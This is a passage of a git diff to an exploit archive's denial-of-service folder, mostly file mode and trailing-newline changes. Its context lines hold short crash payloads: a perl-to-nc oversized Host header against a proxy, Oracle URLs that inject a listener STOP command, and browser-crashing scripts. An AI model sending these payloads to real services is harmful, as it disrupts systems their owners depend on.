b/platforms/multiple/dos/21911.txt @@ -13,4 +13,4 @@ GET /example.html/ HTTP/1.1 host: host name Transfer-Encoding: chunked <ENTER> -<ENTER> \ No newline at end of file +<ENTER> \ No newline at end of file diff --git a/platforms/multiple/dos/22010.txt b/platforms/multiple/dos/22010.txt old mode 100755 new mode 100644 index 16be770b7..d9c33ed43 --- a/platforms/multiple/dos/22010.txt +++ b/platforms/multiple/dos/22010.txt @@ -4,4 +4,4 @@ A buffer overflow vulnerability has been reported for the Hotfoon dialer. The vu It is possible to crash the service and execute code. -Voice:aaaaaa.........76 a's \ No newline at end of file +Voice:aaaaaa.........76 a's \ No newline at end of file diff --git a/platforms/multiple/dos/22053.txt b/platforms/multiple/dos/22053.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/22207.txt b/platforms/multiple/dos/22207.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/22223.txt b/platforms/multiple/dos/22223.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/22345.txt b/platforms/multiple/dos/22345.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/22358.cfm b/platforms/multiple/dos/22358.cfm old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/22359.xsl b/platforms/multiple/dos/22359.xsl old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/22360.java b/platforms/multiple/dos/22360.java old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/22441.txt b/platforms/multiple/dos/22441.txt old mode 100755 new mode 100644 index 12ae39827..ac6fdd0a5 --- a/platforms/multiple/dos/22441.txt +++ b/platforms/multiple/dos/22441.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability by creating a malicious JavaScript pa <script language="Javascript"> t = new Packages.sun.plugin.javascript.navig5.JSObject(1,1); -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/multiple/dos/22503.c b/platforms/multiple/dos/22503.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/22505.txt b/platforms/multiple/dos/22505.txt old mode 100755 new mode 100644 index e3c9c1750..d970bdf1a --- a/platforms/multiple/dos/22505.txt +++ b/platforms/multiple/dos/22505.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7375/info A vulnerability has been reported for the mod_access_referer Apache module. The problem occurs when parsing invalid HTTP referer header fields. If this vulnerability were to be triggered, it may be possible to trigger a NULL pointer dereference, effectively causing Apache to segfault. -Referer: ://its-missing-http.com \ No newline at end of file +Referer: ://its-missing-http.com \ No newline at end of file diff --git a/platforms/multiple/dos/22512.txt b/platforms/multiple/dos/22512.txt old mode 100755 new mode 100644 index 82d41ecae..d410b31e2 --- a/platforms/multiple/dos/22512.txt +++ b/platforms/multiple/dos/22512.txt @@ -7,4 +7,4 @@ The vulnerability occurs due to a lack of sufficient bounds checking performed o This vulnerability is reported to affect mod_ntlm <= v0.4 for Apache 1.3 and mod_ntlmv2 version 0.1 for Apache 2.0. GET / HTTP/1.0 -Authorization: [Ax3000] \ No newline at end of file +Authorization: [Ax3000] \ No newline at end of file diff --git a/platforms/multiple/dos/22514.txt b/platforms/multiple/dos/22514.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/22535.txt b/platforms/multiple/dos/22535.txt old mode 100755 new mode 100644 index d068ca816..5538c0114 --- a/platforms/multiple/dos/22535.txt +++ b/platforms/multiple/dos/22535.txt @@ -6,4 +6,4 @@ The system must be restarted to restore regularly functionality. Transmit 90 packets to the target server, each containing the following data: -GET /xxx...[100]..xxx.htm HTTP/1.0, \ No newline at end of file +GET /xxx...[100]..xxx.htm HTTP/1.0, \ No newline at end of file diff --git a/platforms/multiple/dos/22536.txt b/platforms/multiple/dos/22536.txt old mode 100755 new mode 100644 index 9584f2da3..dfee9c53f --- a/platforms/multiple/dos/22536.txt +++ b/platforms/multiple/dos/22536.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7430/info Allegedly, a vulnerability exists in Opera 7.10 that may result in a denial of service. The problem reportedly occurs when processing a 'news:' URL of excessive length. It has been reported that this issue will trigger a condition that will prevent Opera from functioning until the program has been reinstalled. -news:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... \ No newline at end of file +news:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... \ No newline at end of file diff --git a/platforms/multiple/dos/22634.txt b/platforms/multiple/dos/22634.txt old mode 100755 new mode 100644 index 88a7e6058..21478a166 --- a/platforms/multiple/dos/22634.txt +++ b/platforms/multiple/dos/22634.txt @@ -6,4 +6,4 @@ Note that this malicious script must be a legitimate plugin that has been upload insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd); scanner_add_port(port : 80, proto : crap(data:'A', length:300)); -ftp_log_in (socket : open_sock_tcp(21), pass : "11", user:crap (data:'A',length:8192) ); \ No newline at end of file +ftp_log_in (socket : open_sock_tcp(21), pass : "11", user:crap (data:'A',length:8192) ); \ No newline at end of file diff --git a/platforms/multiple/dos/22650.py b/platforms/multiple/dos/22650.py index 487e7ef90..a867e6023 100755 --- a/platforms/multiple/dos/22650.py +++ b/platforms/multiple/dos/22650.py @@ -27,4 +27,4 @@ conn.request(met, "/"+spl) r1 = conn.getresponse() print r1.status -}--------- end of fadvWWhtdos.py ---------------{ \ No newline at end of file +}--------- end of fadvWWhtdos.py ---------------{ \ No newline at end of file diff --git a/platforms/multiple/dos/22859.txt b/platforms/multiple/dos/22859.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/22926.txt b/platforms/multiple/dos/22926.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/22935.txt b/platforms/multiple/dos/22935.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/2303.html b/platforms/multiple/dos/2303.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/23050.txt b/platforms/multiple/dos/23050.txt old mode 100755 new mode 100644 index 707a98a0b..5e77134ad --- a/platforms/multiple/dos/23050.txt +++ b/platforms/multiple/dos/23050.txt @@ -5,4 +5,4 @@ It has been reported that a buffer overflow condition exists in the Avant Browse This issue may cause an attack to run arbitrary code on a host in the context of the user running the vulnerable version of Avant Browser. http://AAAAAAA[more 780 chars] -<a href="http://AAA[more 780 chars]">aaa</a> \ No newline at end of file +<a href="http://AAA[more 780 chars]">aaa</a> \ No newline at end of file diff --git a/platforms/multiple/dos/23051.txt b/platforms/multiple/dos/23051.txt old mode 100755 new mode 100644 index c31299e8f..5a0057e91 --- a/platforms/multiple/dos/23051.txt +++ b/platforms/multiple/dos/23051.txt @@ -14,4 +14,4 @@ b) 0x89, 0x77, 0x13, 0x86, 0x3d to port 9201 (Connection-orientated non WTLS) To Cause Out Of Memory Send the following over the specified listening ports: -a) 0xa6, 0x09, 0x5d to port 9201 (Connection-orientated non WTLS) \ No newline at end of file +a) 0xa6, 0x09, 0x5d to port 9201 (Connection-orientated non WTLS) \ No newline at end of file diff --git a/platforms/multiple/dos/23142.txt b/platforms/multiple/dos/23142.txt old mode 100755 new mode 100644 index c96221d8d..adc0a228e --- a/platforms/multiple/dos/23142.txt +++ b/platforms/multiple/dos/23142.txt @@ -6,4 +6,4 @@ It has been reported that the condition may be triggered remotely when a malicio This vulnerability has been reported to affect WideChapter version 3, and prior versions. -[script]window.open(http://AAA.. [Ax517])[/script] \ No newline at end of file +[script]window.open(http://AAA.. [Ax517])[/script] \ No newline at end of file diff --git a/platforms/multiple/dos/23181.txt b/platforms/multiple/dos/23181.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/23231.txt b/platforms/multiple/dos/23231.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/23263.txt b/platforms/multiple/dos/23263.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/23276.java b/platforms/multiple/dos/23276.java old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/23292.java b/platforms/multiple/dos/23292.java old mode 100755 new mode 100644 index 0057e3740..d0ca5b068 --- a/platforms/multiple/dos/23292.java +++ b/platforms/multiple/dos/23292.java @@ -15,4 +15,4 @@ public static void main(String[] a) { InSecurityManager m = new InSecurityManager(); m.doit(); } -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/multiple/dos/23314.c b/platforms/multiple/dos/23314.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/23325.c b/platforms/multiple/dos/23325.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/23390.txt b/platforms/multiple/dos/23390.txt old mode 100755 new mode 100644 index 4c40909cf..5cd17e474 --- a/platforms/multiple/dos/23390.txt +++ b/platforms/multiple/dos/23390.txt @@ -17,4 +17,4 @@ telnet>close telnet>quit hacker# -Crash service \ No newline at end of file +Crash service \ No newline at end of file diff --git a/platforms/multiple/dos/23524.c b/platforms/multiple/dos/23524.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/23543.txt b/platforms/multiple/dos/23543.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/23556.txt b/platforms/multiple/dos/23556.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/23590.txt b/platforms/multiple/dos/23590.txt old mode 100755 new mode 100644 index 4cbcf6045..49292406d --- a/platforms/multiple/dos/23590.txt +++ b/platforms/multiple/dos/23590.txt @@ -8,4 +8,4 @@ strings like: GET index.htm without specify the HTTP* at the end of the GET request, and where -the requested file must be avaible in the public_html directory. \ No newline at end of file +the requested file must be avaible in the public_html directory. \ No newline at end of file diff --git a/platforms/multiple/dos/23641.txt b/platforms/multiple/dos/23641.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/23642.txt b/platforms/multiple/dos/23642.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/23656.txt b/platforms/multiple/dos/23656.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/23755.txt b/platforms/multiple/dos/23755.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/23787.txt b/platforms/multiple/dos/23787.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/23799.txt b/platforms/multiple/dos/23799.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/23805.txt b/platforms/multiple/dos/23805.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/23902.txt b/platforms/multiple/dos/23902.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/23904.txt b/platforms/multiple/dos/23904.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24013.txt b/platforms/multiple/dos/24013.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24066.txt b/platforms/multiple/dos/24066.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24070.txt b/platforms/multiple/dos/24070.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24130.txt b/platforms/multiple/dos/24130.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24170.txt b/platforms/multiple/dos/24170.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24242.java b/platforms/multiple/dos/24242.java old mode 100755 new mode 100644 index f2e24ea4d..e62833b9a --- a/platforms/multiple/dos/24242.java +++ b/platforms/multiple/dos/24242.java @@ -74,4 +74,4 @@ public class FontIPSClass extends Applet{ } -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/multiple/dos/24247.txt b/platforms/multiple/dos/24247.txt old mode 100755 new mode 100644 index 89596b375..9f18d0cf2 --- a/platforms/multiple/dos/24247.txt +++ b/platforms/multiple/dos/24247.txt @@ -10,4 +10,4 @@ An example of a long username URI: http://www.example.com/chat.ghp?username=aaaa[ 295 of a ]aaaa&password=&room=1&sex=0 An example of creating a fake user: -http://www.example.com/chat.ghp?username=FakeUser&password=&room=1&sex=0 \ No newline at end of file +http://www.example.com/chat.ghp?username=FakeUser&password=&room=1&sex=0 \ No newline at end of file diff --git a/platforms/multiple/dos/24282.txt b/platforms/multiple/dos/24282.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24283.txt b/platforms/multiple/dos/24283.txt old mode 100755 new mode 100644 index c98420162..812acdebd --- a/platforms/multiple/dos/24283.txt +++ b/platforms/multiple/dos/24283.txt @@ -8,4 +8,4 @@ Version 1.1.10.0 is reported vulnerable. Prior versions may also contain these v list 99999999999999999999999 retr 99999999999999999999999 -uidl 98409583490583409539405 \ No newline at end of file +uidl 98409583490583409539405 \ No newline at end of file diff --git a/platforms/multiple/dos/24305.txt b/platforms/multiple/dos/24305.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24351.c b/platforms/multiple/dos/24351.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24352.java b/platforms/multiple/dos/24352.java old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24386.txt b/platforms/multiple/dos/24386.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24388.txt b/platforms/multiple/dos/24388.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24394.txt b/platforms/multiple/dos/24394.txt old mode 100755 new mode 100644 index 72cd4d3aa..c4d5c81a7 --- a/platforms/multiple/dos/24394.txt +++ b/platforms/multiple/dos/24394.txt @@ -8,4 +8,4 @@ This issue affects Opera 7.23 for Microsoft Windows; other versions are also lik <scr1pt> document.getElementsByTagName("script")[0].text = ""; -</scr1pt> \ No newline at end of file +</scr1pt> \ No newline at end of file diff --git a/platforms/multiple/dos/24423.txt b/platforms/multiple/dos/24423.txt old mode 100755 new mode 100644 index f9826d64f..f92dcd12b --- a/platforms/multiple/dos/24423.txt +++ b/platforms/multiple/dos/24423.txt @@ -6,4 +6,4 @@ A remote attacker may cause a denial of service condition in the proxy leading t Cerbère Proxy 1.2 is reported prone to this issue, however, other versions may be affected as well. -perl -e 'print "GET / HTTP/1.1\r\n" . "Host: " . "A" x 90000 . "\r\n" . "\r\n\r\n" ' | nc "Proxy_IP" 3128 \ No newline at end of file +perl -e 'print "GET / HTTP/1.1\r\n" . "Host: " . "A" x 90000 . "\r\n" . "\r\n\r\n" ' | nc "Proxy_IP" 3128 \ No newline at end of file diff --git a/platforms/multiple/dos/24486.txt b/platforms/multiple/dos/24486.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24592.txt b/platforms/multiple/dos/24592.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24597.txt b/platforms/multiple/dos/24597.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24610.txt b/platforms/multiple/dos/24610.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24668.txt b/platforms/multiple/dos/24668.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24691.txt b/platforms/multiple/dos/24691.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24710.txt b/platforms/multiple/dos/24710.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24715.txt b/platforms/multiple/dos/24715.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24761.txt b/platforms/multiple/dos/24761.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24763.txt b/platforms/multiple/dos/24763.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24778.html b/platforms/multiple/dos/24778.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24781.html b/platforms/multiple/dos/24781.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24793.txt b/platforms/multiple/dos/24793.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24799.txt b/platforms/multiple/dos/24799.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24805.txt b/platforms/multiple/dos/24805.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24807.txt b/platforms/multiple/dos/24807.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24809.txt b/platforms/multiple/dos/24809.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/24818.txt b/platforms/multiple/dos/24818.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/25056.html b/platforms/multiple/dos/25056.html old mode 100755 new mode 100644 index 47f8f204a..e2c50086f --- a/platforms/multiple/dos/25056.html +++ b/platforms/multiple/dos/25056.html @@ -6,4 +6,4 @@ Netscape Navigator is prone to a vulnerability that may result in a browser cras <HTML> <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT> <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT> -</HTML> \ No newline at end of file +</HTML> \ No newline at end of file diff --git a/platforms/multiple/dos/25081.txt b/platforms/multiple/dos/25081.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/2515.txt b/platforms/multiple/dos/2515.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/25165.c b/platforms/multiple/dos/25165.c old mode 100755 new mode 100644 index 751d1523f..c960d18d4 --- a/platforms/multiple/dos/25165.c +++ b/platforms/multiple/dos/25165.c @@ -70,4 +70,4 @@ void help(char *program_name) { printf("\t-=[ Coded by ders -/www.x0n3-h4ck.org\\- ]=-\n\n"); printf("Usage: %s <Host> <Port>\n",program_name); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/multiple/dos/25171.txt b/platforms/multiple/dos/25171.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/25387.txt b/platforms/multiple/dos/25387.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/25388.txt b/platforms/multiple/dos/25388.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/25389.txt b/platforms/multiple/dos/25389.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/25393.txt b/platforms/multiple/dos/25393.txt old mode 100755 new mode 100644 index f2958c820..945aaec93 --- a/platforms/multiple/dos/25393.txt +++ b/platforms/multiple/dos/25393.txt @@ -4,4 +4,4 @@ An insecure default password disclosure vulnerability affects XAMPP. This issue An attacker may leverage this issue to gain access to the default passwords for many utilities installed by the affected application, including the MySQL 'root' user, the phpMyAdmin 'pma' user, the FTP 'nobody' user and the Tomcat administrator. -http://www.example.com/xampp/security.php \ No newline at end of file +http://www.example.com/xampp/security.php \ No newline at end of file diff --git a/platforms/multiple/dos/25439.c b/platforms/multiple/dos/25439.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/25470.txt b/platforms/multiple/dos/25470.txt old mode 100755 new mode 100644 index 44aed3661..2bfefc03d --- a/platforms/multiple/dos/25470.txt +++ b/platforms/multiple/dos/25470.txt @@ -10,4 +10,4 @@ A remote attacker may exploit this condition crash the software and effectively 4500 0040 5df3 4000 4006 226e c0a8 1c85 c0a8 1c81 8003 eff3 90a8 d150 7cda 8afa 8018 16d0 daab 0000 0101 080a 0000 8cbe -0000 0000 6352 0100 0000 0000 0000 0000 \ No newline at end of file +0000 0000 6352 0100 0000 0000 0000 0000 \ No newline at end of file diff --git a/platforms/multiple/dos/25584.txt b/platforms/multiple/dos/25584.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/25692.txt b/platforms/multiple/dos/25692.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/25757.txt b/platforms/multiple/dos/25757.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/25791.txt b/platforms/multiple/dos/25791.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/2587.txt b/platforms/multiple/dos/2587.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/26145.c b/platforms/multiple/dos/26145.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/26325.txt b/platforms/multiple/dos/26325.txt old mode 100755 new mode 100644 index 0b216aaf4..1c8b7fd2c --- a/platforms/multiple/dos/26325.txt +++ b/platforms/multiple/dos/26325.txt @@ -8,4 +8,4 @@ A successful attack may result in crashing the application, or consuming excessi It should be noted that this issue was reported to affect Firefox 1.0.6 and 1.0.7 running on Linux. Other versions running on different platforms may be vulnerable as well. -IFRAME WIDTH=33333333 \ No newline at end of file +IFRAME WIDTH=33333333 \ No newline at end of file diff --git a/platforms/multiple/dos/26331.txt b/platforms/multiple/dos/26331.txt old mode 100755 new mode 100644 index d526fcf60..a455dbe12 --- a/platforms/multiple/dos/26331.txt +++ b/platforms/multiple/dos/26331.txt @@ -8,4 +8,4 @@ This issue was reported in Oracle Database version 9.0.2.4; other versions may a These issues was originally described and addressed in Oracle Critical Patch Update - July 2005, BID 14238 (Oracle July Security Update Multiple Vulnerabilities). Due to the availability of more information, these issues are being assigned a separate BID. -http://www.example.com:3339/isqlplus?username=s&password=s&sid=%28DESCRIPTION%3D%28ADDRESS_LIST%3D%28ADDRESS%3D%28PROTOCOL%3DTCP%29%28HOST%3Dlocalhost%29%28PORT%3D1521%29%29%29%28CONNECT_DATA%3D%28COMMAND%3DSTOP%29%28SERVICE%3DLISTENER%29%28USER%3DHacker%29%29%29&login=Login&action=logon \ No newline at end of file +http://www.example.com:3339/isqlplus?username=s&password=s&sid=%28DESCRIPTION%3D%28ADDRESS_LIST%3D%28ADDRESS%3D%28PROTOCOL%3DTCP%29%28HOST%3Dlocalhost%29%28PORT%3D1521%29%29%29%28CONNECT_DATA%3D%28COMMAND%3DSTOP%29%28SERVICE%3DLISTENER%29%28USER%3DHacker%29%29%29&login=Login&action=logon \ No newline at end of file diff --git a/platforms/multiple/dos/26336.txt b/platforms/multiple/dos/26336.txt old mode 100755 new mode 100644 index e8169db73..298452c03 --- a/platforms/multiple/dos/26336.txt +++ b/platforms/multiple/dos/26336.txt @@ -8,4 +8,4 @@ This issue was reported in Oracle Forms versions prior to July 2005. This issue was originally described and addressed in Oracle Critical Patch Update - July 2005, BID 14238 (Oracle July Security Update Multiple Vulnerabilities). Due to the availability of more information, this issue is being assigned a separate BID. -http://www.example.com:8888/forms90/f90servlet?form=test.fmx&userid=SCOTT/TIGER@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=server)(PORT=1521)))(CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER)))&buffer_records=NO&debug_messages=NO&array=YES&query_only=NO&quiet=NO&RENDER=YES \ No newline at end of file +http://www.example.com:8888/forms90/f90servlet?form=test.fmx&userid=SCOTT/TIGER@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=server)(PORT=1521)))(CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER)))&buffer_records=NO&debug_messages=NO&array=YES&query_only=NO&quiet=NO&RENDER=YES \ No newline at end of file diff --git a/platforms/multiple/dos/26710.txt b/platforms/multiple/dos/26710.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/26762.html b/platforms/multiple/dos/26762.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/2695.html b/platforms/multiple/dos/2695.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/26967.txt b/platforms/multiple/dos/26967.txt old mode 100755 new mode 100644 index 56d050629..69c79bde2 --- a/platforms/multiple/dos/26967.txt +++ b/platforms/multiple/dos/26967.txt @@ -8,4 +8,4 @@ The second issue may allow remote attackers to crash an instance of the applicat httprint version 202 is vulnerable to these issues. -SecServerSignature "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."x1500 \ No newline at end of file +SecServerSignature "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."x1500 \ No newline at end of file diff --git a/platforms/multiple/dos/27026.txt b/platforms/multiple/dos/27026.txt old mode 100755 new mode 100644 index ec3f2cbba..fd09562e0 --- a/platforms/multiple/dos/27026.txt +++ b/platforms/multiple/dos/27026.txt @@ -28,4 +28,4 @@ html.write("<html><head>\n" 'http://www.mozilla.org')\" >\n" "</body></html>") -html.close() \ No newline at end of file +html.close() \ No newline at end of file diff --git a/platforms/multiple/dos/27094.txt b/platforms/multiple/dos/27094.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/27108.txt b/platforms/multiple/dos/27108.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/27140.txt b/platforms/multiple/dos/27140.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/27159.txt b/platforms/multiple/dos/27159.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/27171.txt b/platforms/multiple/dos/27171.txt old mode 100755 new mode 100644 index e0b749b0e..c8652a64f --- a/platforms/multiple/dos/27171.txt +++ b/platforms/multiple/dos/27171.txt @@ -6,4 +6,4 @@ This issue allows remote attackers to crash the application, denying service to Sample Python code has been provided by Evgeny Legerov that may demonstrate this issue: -from socket import * \ No newline at end of file +from socket import * \ No newline at end of file diff --git a/platforms/multiple/dos/27196.txt b/platforms/multiple/dos/27196.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/27210.txt b/platforms/multiple/dos/27210.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/27211.txt b/platforms/multiple/dos/27211.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/27212.txt b/platforms/multiple/dos/27212.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/27365.txt b/platforms/multiple/dos/27365.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/27420.c b/platforms/multiple/dos/27420.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/27421.txt b/platforms/multiple/dos/27421.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/27474.txt b/platforms/multiple/dos/27474.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/27547.txt b/platforms/multiple/dos/27547.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/27566.txt b/platforms/multiple/dos/27566.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/27639.txt b/platforms/multiple/dos/27639.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/27640.txt b/platforms/multiple/dos/27640.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/27668.c b/platforms/multiple/dos/27668.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/27901.java b/platforms/multiple/dos/27901.java old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/27969.c b/platforms/multiple/dos/27969.c old mode 100755 new mode 100644 index 5f449f620..12ce2a2c2 --- a/platforms/multiple/dos/27969.c +++ b/platforms/multiple/dos/27969.c @@ -1,10 +1,11 @@ -source: http://www.securityfocus.com/bid/18271/info - -The Quake 3 engine is susceptible to a remote buffer-overflow vulnerability. This issue is due to the application's failure to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. - -Remote attackers may exploit this issue to execute arbitrary machine code in the context of affected game clients. Failed exploit attempts will likely crash affected clients. - -Quake 3 version 1.32c and Icculus.org Quake 3 revision 795 are vulnerable to this issue; other versions may also be affected. The affected game engine has been used to create many derivative games, which may also be affected. +// source: http://www.securityfocus.com/bid/18271/info +// +// The Quake 3 engine is susceptible to a remote buffer-overflow vulnerability. This issue is due to the application's failure to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. +// +// Remote attackers may exploit this issue to execute arbitrary machine code in the context of affected game clients. Failed exploit attempts will likely crash affected clients. +// +// Quake 3 version 1.32c and Icculus.org Quake 3 revision 795 are vulnerable to this issue; other versions may also be affected. The affected game engine has been used to create many derivative games, which may also be affected. +// // send the gamestate int i; diff --git a/platforms/multiple/dos/27993.txt b/platforms/multiple/dos/27993.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/28065.vmx b/platforms/multiple/dos/28065.vmx old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/28182.java b/platforms/multiple/dos/28182.java old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/28277.txt b/platforms/multiple/dos/28277.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/28293.txt b/platforms/multiple/dos/28293.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/28345.txt b/platforms/multiple/dos/28345.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/28361.c b/platforms/multiple/dos/28361.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/28491.txt b/platforms/multiple/dos/28491.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/28542.pl b/platforms/multiple/dos/28542.pl index d66fbc345..4c3c5246d 100755 --- a/platforms/multiple/dos/28542.pl +++ b/platforms/multiple/dos/28542.pl @@ -31,4 +31,4 @@ else { print "Cannot connect to $ARGV[0]:23\n"; } -# __END_CODE \ No newline at end of file +# __END_CODE \ No newline at end of file diff --git a/platforms/multiple/dos/2857.php b/platforms/multiple/dos/2857.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/28666.txt b/platforms/multiple/dos/28666.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/28679.txt b/platforms/multiple/dos/28679.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/2910.txt b/platforms/multiple/dos/2910.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/2911.txt b/platforms/multiple/dos/2911.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/2912.txt b/platforms/multiple/dos/2912.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/29305.txt b/platforms/multiple/dos/29305.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/29310.txt b/platforms/multiple/dos/29310.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/2949.c b/platforms/multiple/dos/2949.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/29502.html b/platforms/multiple/dos/29502.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/29875.py b/platforms/multiple/dos/29875.py index c51744daa..9795b37ca 100755 --- a/platforms/multiple/dos/29875.py +++ 